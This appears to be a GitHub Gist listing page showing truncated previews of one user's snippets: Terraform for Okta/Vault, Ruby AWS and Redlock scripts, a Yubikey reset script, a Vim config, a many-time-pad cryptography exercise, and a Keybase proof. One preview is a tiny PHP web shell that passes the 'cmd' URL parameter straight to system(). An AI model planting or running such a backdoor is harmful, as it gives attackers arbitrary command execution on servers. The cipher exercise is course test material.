I've migrated the contents of this Gist to this Medium post for better readability.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
module "okta" { | |
source = "onetwopunch/okta/vault" | |
version = "<version>" | |
okta_discovery_url = "<Okta Authorization Server Issuer>" | |
okta_client_id = "<Okta Vault App Client ID>" | |
okta_client_secret = "<Okta Vault App Client Secret>" | |
vault_addr = "https://<Vault Domain>:8200" | |
okta_bound_audiences = [ | |
"api://vault", |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env ruby | |
require 'httparty' | |
require 'json' | |
class Redlock | |
include HTTParty | |
base_uri 'https://app.redlock.com' | |
def initiailize(jwt) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env ruby | |
require 'aws-sdk-iam' | |
client = Aws::IAM::Client.new | |
resp = client.list_ssh_public_keys(user_name: ARGV[1], max_items: 1) | |
pub_key_id = resp.ssh_public_keys.first.ssh_public_key_id | |
puts client.get_ssh_public_key({ | |
user_name: ARGV[1], |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
echo "This will wipe the Yubikey and restore to factory settings" | |
read -p "Are you sure? (y/n)" -n 1 -r | |
if [[ $REPLY =~ ^[Yy]$ ]] | |
then | |
gpg-connect-agent <<EOF | |
/hex | |
scd serialno | |
scd apdu 00 20 00 81 08 40 40 40 40 40 40 40 40 | |
scd apdu 00 20 00 81 08 40 40 40 40 40 40 40 40 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
echo "<script>alert(U 4r3 0wn3d !!);</script>"; | |
echo "Run command: ".htmlspecialchars($_GET['cmd']); | |
system($_GET['cmd']); | |
?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
"External plugins used: | |
" Pathogen | |
" NERDTree | |
" AutoComplPop | |
" DetectIndent | |
" L9 for autocomplete | |
" ACK | |
" | |
"Use Vim settings, rather than Vi settings (much better!). | |
" This must be first, because it changes other options as a side effect. |
Many Time Pad
Let us see what goes wrong when a stream cipher key is used more than once. Below are eleven hex-encoded ciphertexts that are the result of encrypting eleven plaintexts with a stream cipher, all with the same stream cipher key. Your goal is to decrypt the last ciphertext, and submit the secret message within it as solution.
Hint: XOR the ciphertexts together, and consider what happens when a space is XORed with a character in [a-zA-Z].
ciphertext #1:
315c4eeaa8b5f8aaf9174145bf43e1784b8fa00dc71d885a804e5ee9fa40b16349c146fb778cdf2d3aff021dfff5b403b510d0d0455468aeb98622b137dae857553ccd8883a7bc37520e06e515d22c954eba5025b8cc57ee59418ce7dc6bc41556bdb36bbca3e8774301fbcaa3b83b220809560987815f65286764703de0f3d524400a19b159610b11ef3e
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
### Keybase proof | |
I hereby claim: | |
* I am onetwopunch on github. | |
* I am jryancanty (https://keybase.io/jryancanty) on keybase. | |
* I have a public key ASBR6C_i42SrAvGAVoFbdfAonNSS2_HP8dPN0L3W4xKfYQo | |
To claim this, I am signing this object: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
First, you create a new file: ~/Scripts/lime.sh | |
file=$1 | |
if [ ! -e "$file" ] ; then | |
touch "$file" | |
fi | |
open -a Sublime\ Text\ 2 $file | |
Since I keep this with my handy scripts in my home directory, I just make it executable to other users with: |